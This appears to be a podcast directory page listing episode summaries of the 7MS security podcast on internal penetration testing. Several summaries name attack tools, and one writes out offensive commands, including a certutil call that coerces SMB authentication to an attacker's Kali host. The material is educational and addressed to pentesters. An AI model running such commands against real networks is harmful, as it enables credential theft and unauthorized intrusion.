7MS #617: Tales of Pentest Pwnage – Part 55
7 Minute Security29 Maalis 2024

7MS #617: Tales of Pentest Pwnage – Part 55

Hey friends, today we’ve got a tale of pentest pwnage that covers:

  • Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)!
  • Making sure you go after cached credentials
  • Attacking SCCM – Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest – Part 2 with Gabriel Prud’homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs.

Kokeile Premiumia

Nauti 14 päivää ilmaiseksi

Kokeile ilmaiseksiArrow Right

Jaksot(684)

7MS #637: BPATTY[RELOADED] Release Party

7MS #637: BPATTY[RELOADED] Release Party

Hello friends, I’m excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian’s Pentesting and Technical Tips for You! It’s a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

17 Elo 20247min

7MS #636: A Prelude to BPATTY(RELOADED)

7MS #636: A Prelude to BPATTY(RELOADED)

Artificial hype alert!  I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation.  It’s weird.  But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).

12 Elo 202411min

7MS #635: Eating the Security Dog Food - Part 7

7MS #635: Eating the Security Dog Food - Part 7

Today we’re talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

3 Elo 202445min

7MS #634: Tales of Pentest Pwnage - Part 60

7MS #634: Tales of Pentest Pwnage - Part 60

Hi, today’s tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

26 Heinä 202432min

7MS #633: How to Create a Security Knowledgebase with Docusaurus

7MS #633: How to Create a Security Knowledgebase with Docusaurus

Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus!  It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include: docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site

19 Heinä 202414min

7MS #632: Tales of Pentest Pwnage – Part 59

7MS #632: Tales of Pentest Pwnage – Part 59

Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps. Can’t RDP into a victim system that you’re PSRemote’d into?  Maybe RDP is listening on an alternate port!  Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

12 Heinä 202448min

7MS #631: Tales of Pentest Pwnage – Part 58

7MS #631: Tales of Pentest Pwnage – Part 58

Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket

7 Heinä 202415min

7MS #630: Epic Road Trip Served with Security Sprinkles

7MS #630: Epic Road Trip Served with Security Sprinkles

Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some internal pentest tips that have given us some gold in recent assessments Super fast, spoiler-free movie reviews of Roadhouse, Arcadian, Late Night with the Devil and The Coffee Table

1 Heinä 202445min

Kaikki yhdessä sovelluksessa

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi yhdessä paikassa.

Sinulle valikoitua sisältöä

Podme-sovelluksessa kokoat suosikkisi helposti omaan kirjastoosi. Saat meiltä myös kuuntelusuosituksia!

Jatka kuuntelua koska tahansa

Voit jatkaa siitä mihin jäit, myös offline-tilassa.

Premium

9,99 €/kk

  • Kaikki premium-podcastit
  • Ei mainoksia
  • Ei sitoutumista, peruuta koska tahansa

Premium

13,99 €/kk

  • Kaikki premium-podcastit
  • Ei mainoksia
  • Ei sitoutumista, peruuta koska tahansa
  • Yksi lisäkäyttäjä

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
aikalisa
ootsa-kuullut-tasta-2
et-sa-noin-voi-sanoo-esittaa
otetaan-yhdet
politiikan-puskaradio
rss-vaalirankkurit-podcast
aihe
rikosmyytit
the-ulkopolitist
rss-kovin-paikka
linda-maria
rss-mina-ukkola
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
radio-antro
rss-aijat-hopottaa-podcast
rss-kaikki-uusiksi
rss-hyvaa-huomenta-bryssel
rss-raha-talous-ja-politiikka
rss-kyselytunti

Tarinat ja äänet, joita rakastat kuunnella

Kuuntele kaikki suosikkipodcastisi ja -äänikirjasi

Lue lisääArrow Right